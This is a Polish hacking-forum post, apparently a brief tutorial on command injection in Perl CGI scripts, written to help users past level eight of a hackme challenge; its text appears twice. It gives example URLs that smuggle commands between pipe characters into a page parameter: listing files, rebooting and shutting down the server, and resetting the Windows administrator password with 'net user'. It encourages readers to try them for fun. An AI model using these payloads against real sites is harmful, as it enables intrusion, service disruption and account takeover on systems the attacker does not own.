Magnefikko
Były Moderator
- Dołączył
- Maj 29, 2004
- Posty
- 709
Perl Remote Attack
by Magnefikko
Do napisania tego którkiego (acz wystarczającego) tutoriala skłoniły mnie trudności użytkowników w pezejściu LVL'u
ósmego w hackme A Welcome Burden. Co prawda pisząc go praktycznie unieważniam to
zadanie, ale wiedza chce wolności
Perl Remote Attack - właściwie nie tak brzmi ta nazwa. Zupełnie jej nie pamiętam, więc wymyśliłem o takie coś
Jest to dość słabo znany atak (co widać), jednak znany powinien być.
Jak zapewne wiecie, niektórzy Dziwni Ludzie do tworzenia stron używają skryptów perl. Cała sztuczka polega na tym,
że z poziomu zmiennej możemy wydać systemowi na którym stoi skrypt dowolne polecenie. Wystarczy że umieścimy je
między znakami |. Przykład:
Wklepujemy sobie
I skrypt zwraca nam (w większości przypadków, to zależy od samego skryptu) listę plików w danym katalogu
Reset, ot tak for fun.
Shoutdown...
Słyszałem że działa tylko na systemach unixowych, ale teoretycznie możemy zabawiać się też terminalem Windowsa i
tym podobnych.
I tak dalej, i tak dalej...
Przepraszam że tak chaotycznie, bez ładu i składu ale piszę w pracy pod presją Myślę że warto znać tę metodę, a
to co nabazgrałem do jej kojarzenia starczy zupełnie.
Miłej zabawy.
[proszę o przeniesienie do odpowiedniego działu... na przykład kosza xD]
by Magnefikko
Do napisania tego którkiego (acz wystarczającego) tutoriala skłoniły mnie trudności użytkowników w pezejściu LVL'u
ósmego w hackme A Welcome Burden. Co prawda pisząc go praktycznie unieważniam to
zadanie, ale wiedza chce wolności
Perl Remote Attack - właściwie nie tak brzmi ta nazwa. Zupełnie jej nie pamiętam, więc wymyśliłem o takie coś
Jest to dość słabo znany atak (co widać), jednak znany powinien być.
Jak zapewne wiecie, niektórzy Dziwni Ludzie do tworzenia stron używają skryptów perl. Cała sztuczka polega na tym,
że z poziomu zmiennej możemy wydać systemowi na którym stoi skrypt dowolne polecenie. Wystarczy że umieścimy je
między znakami |. Przykład:
Kod:
http://www.stronka.pl/viewer.pl?strona=ciastka
Kod:
http://www.stronka.pl/viewer.pl?strona=ciastka|ls|
Kod:
http://www.stronka.pl/viewer.pl?strona=ciastka|reboot|
Kod:
http://www.stronka.pl/viewer.pl?strona=ciastka|shoutdown|
Słyszałem że działa tylko na systemach unixowych, ale teoretycznie możemy zabawiać się też terminalem Windowsa i
tym podobnych.
Kod:
http://www.welovewindows.pl/szukajka.pl?strona=gates|net user administrator blablabla|
Przepraszam że tak chaotycznie, bez ładu i składu ale piszę w pracy pod presją Myślę że warto znać tę metodę, a
to co nabazgrałem do jej kojarzenia starczy zupełnie.
Miłej zabawy.
[proszę o przeniesienie do odpowiedniego działu... na przykład kosza xD]
Ostatnio edytowane przez moderatora: